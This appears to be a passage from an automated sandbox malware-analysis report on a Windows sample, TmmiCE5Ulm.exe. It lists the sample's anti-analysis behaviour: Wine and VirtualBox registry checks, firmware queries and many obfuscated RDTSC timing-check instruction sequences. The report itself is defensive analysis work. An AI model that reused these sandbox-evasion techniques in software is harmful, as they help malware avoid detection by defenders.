                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeSystem information queried: FirmwareTableInformationJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 747FE3 second address: 747FF5 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F05F0F59496h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jg 00007F05F0F59496h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 747FF5 second address: 748002 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8B0A40 second address: 8B0A46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8B0A46 second address: 8B0A4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8B0A4C second address: 8B0A50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8BF1A5 second address: 8BF1B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 js 00007F05F0F4975Eh 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8BF4BA second address: 8BF4BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8BF5FE second address: 8BF602 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8BF602 second address: 8BF610 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F05F0F594A2h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8BF610 second address: 8BF616 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8BFA05 second address: 8BFA2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F05F0F594A6h 0x0000000c jmp 00007F05F0F5949Ch 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8C2066 second address: 8C206B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8C2172 second address: 8C21CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 jno 00007F05F0F594ADh 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007F05F0F59498h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 00000014h 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 add edi, dword ptr [ebp+122D2DF5h] 0x0000002f mov ecx, eax 0x00000031 jne 00007F05F0F59497h 0x00000037 cld 0x00000038 push 9AD9630Eh 0x0000003d pushad 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 pop eax 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8C21CD second address: 8C21E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F49763h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8C21E8 second address: 8C223A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 add dword ptr [esp], 65269D72h 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007F05F0F59498h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 0000001Ch 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 push 00000003h 0x0000002a mov dword ptr [ebp+122D26A8h], ebx 0x00000030 push 00000000h 0x00000032 mov si, C0BAh 0x00000036 push 00000003h 0x00000038 mov dword ptr [ebp+122D279Fh], esi 0x0000003e push 515D0900h 0x00000043 pushad 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8C223A second address: 8C223E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8C22F3 second address: 8C2364 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007F05F0F59498h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 0000001Bh 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 push esi 0x00000028 call 00007F05F0F594A8h 0x0000002d mov di, bx 0x00000030 pop edi 0x00000031 pop esi 0x00000032 push 00000000h 0x00000034 sub esi, 0EA2B86Ch 0x0000003a mov dword ptr [ebp+122D27C9h], edx 0x00000040 push 2ACB4DFEh 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007F05F0F5949Eh 0x0000004c rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8C2364 second address: 8C243C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F05F0F4975Ch 0x00000008 jc 00007F05F0F49756h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 xor dword ptr [esp], 2ACB4D7Eh 0x00000018 sub dword ptr [ebp+122D27F4h], ebx 0x0000001e push 00000003h 0x00000020 push edx 0x00000021 mov dword ptr [ebp+122D35EBh], edx 0x00000027 pop ecx 0x00000028 push 00000000h 0x0000002a jne 00007F05F0F4975Ch 0x00000030 push 00000003h 0x00000032 push 00000000h 0x00000034 push edx 0x00000035 call 00007F05F0F49758h 0x0000003a pop edx 0x0000003b mov dword ptr [esp+04h], edx 0x0000003f add dword ptr [esp+04h], 0000001Ch 0x00000047 inc edx 0x00000048 push edx 0x00000049 ret 0x0000004a pop edx 0x0000004b ret 0x0000004c push 94BE2F36h 0x00000051 pushad 0x00000052 push esi 0x00000053 jmp 00007F05F0F49763h 0x00000058 pop esi 0x00000059 jmp 00007F05F0F49767h 0x0000005e popad 0x0000005f xor dword ptr [esp], 54BE2F36h 0x00000066 jl 00007F05F0F49756h 0x0000006c lea ebx, dword ptr [ebp+1244DF35h] 0x00000072 call 00007F05F0F49768h 0x00000077 or dword ptr [ebp+122D278Fh], edi 0x0000007d pop ecx 0x0000007e push eax 0x0000007f push eax 0x00000080 push edx 0x00000081 push edi 0x00000082 jmp 00007F05F0F4975Bh 0x00000087 pop edi 0x00000088 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8E2767 second address: 8E276D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8E28FC second address: 8E2900 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8E2900 second address: 8E2904 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8E2BDE second address: 8E2BE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8E35EC second address: 8E35F2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8E3742 second address: 8E3746 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8E3746 second address: 8E3750 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8E3750 second address: 8E3781 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F49764h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F05F0F49760h 0x00000014 push eax 0x00000015 pop eax 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8D692F second address: 8D6969 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pushad 0x00000007 jmp 00007F05F0F594A5h 0x0000000c jmp 00007F05F0F5949Fh 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 push edi 0x00000018 jg 00007F05F0F59496h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8D6969 second address: 8D697E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jng 00007F05F0F49756h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8D697E second address: 8D69AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F594A7h 0x00000007 jmp 00007F05F0F594A0h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8D69AC second address: 8D69B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8B5AB6 second address: 8B5AC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F05F0F59496h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8B5AC0 second address: 8B5AE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F49766h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a jnc 00007F05F0F49756h 0x00000010 pop ebx 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 push esi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8B5AE8 second address: 8B5AFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F05F0F59496h 0x0000000a pop esi 0x0000000b push edi 0x0000000c jnp 00007F05F0F59496h 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8B5AFF second address: 8B5B03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8B5B03 second address: 8B5B07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8E3FC0 second address: 8E3FE1 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F05F0F49756h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d pushad 0x0000000e push ecx 0x0000000f jmp 00007F05F0F4975Eh 0x00000014 pop ecx 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8E3FE1 second address: 8E3FEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8E4162 second address: 8E4199 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F05F0F4975Ch 0x00000008 pop ebx 0x00000009 jmp 00007F05F0F49764h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F05F0F4975Bh 0x00000019 push edx 0x0000001a pop edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8E4199 second address: 8E41B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F594A7h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8E41B6 second address: 8E41BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8E41BC second address: 8E41C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8E4737 second address: 8E473B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8E473B second address: 8E4741 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8E4741 second address: 8E4749 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8E4749 second address: 8E474D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8E474D second address: 8E4751 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8EB6F6 second address: 8EB6FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8EF6A3 second address: 8EF6BC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jg 00007F05F0F49756h 0x00000009 pop ebx 0x0000000a pushad 0x0000000b jp 00007F05F0F49756h 0x00000011 jno 00007F05F0F49756h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8EEEAF second address: 8EEEB6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8EF1E9 second address: 8EF1F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jo 00007F05F0F49756h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8EF346 second address: 8EF34A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8EF4E4 second address: 8EF4FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05F0F4975Dh 0x00000009 js 00007F05F0F49756h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8EF4FB second address: 8EF537 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F5949Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c js 00007F05F0F5949Ah 0x00000012 push edi 0x00000013 pop edi 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 jbe 00007F05F0F59496h 0x0000001f jmp 00007F05F0F594A2h 0x00000024 popad 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8EF537 second address: 8EF53D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8F21AA second address: 8F220F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 je 00007F05F0F59496h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c add dword ptr [esp], 1C44F466h 0x00000013 push 00000000h 0x00000015 push esi 0x00000016 call 00007F05F0F59498h 0x0000001b pop esi 0x0000001c mov dword ptr [esp+04h], esi 0x00000020 add dword ptr [esp+04h], 0000001Dh 0x00000028 inc esi 0x00000029 push esi 0x0000002a ret 0x0000002b pop esi 0x0000002c ret 0x0000002d jmp 00007F05F0F594A0h 0x00000032 cld 0x00000033 push BD85BC10h 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007F05F0F594A5h 0x0000003f rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8F27BD second address: 8F27C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8F2E87 second address: 8F2E8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8F2E8D second address: 8F2E91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8F2E91 second address: 8F2EA3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push edi 0x0000000b pushad 0x0000000c popad 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8F2EA3 second address: 8F2EA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8F3200 second address: 8F320F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8F320F second address: 8F3229 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F49766h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8F4B69 second address: 8F4B6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8F69C4 second address: 8F69C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8F69C9 second address: 8F69CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
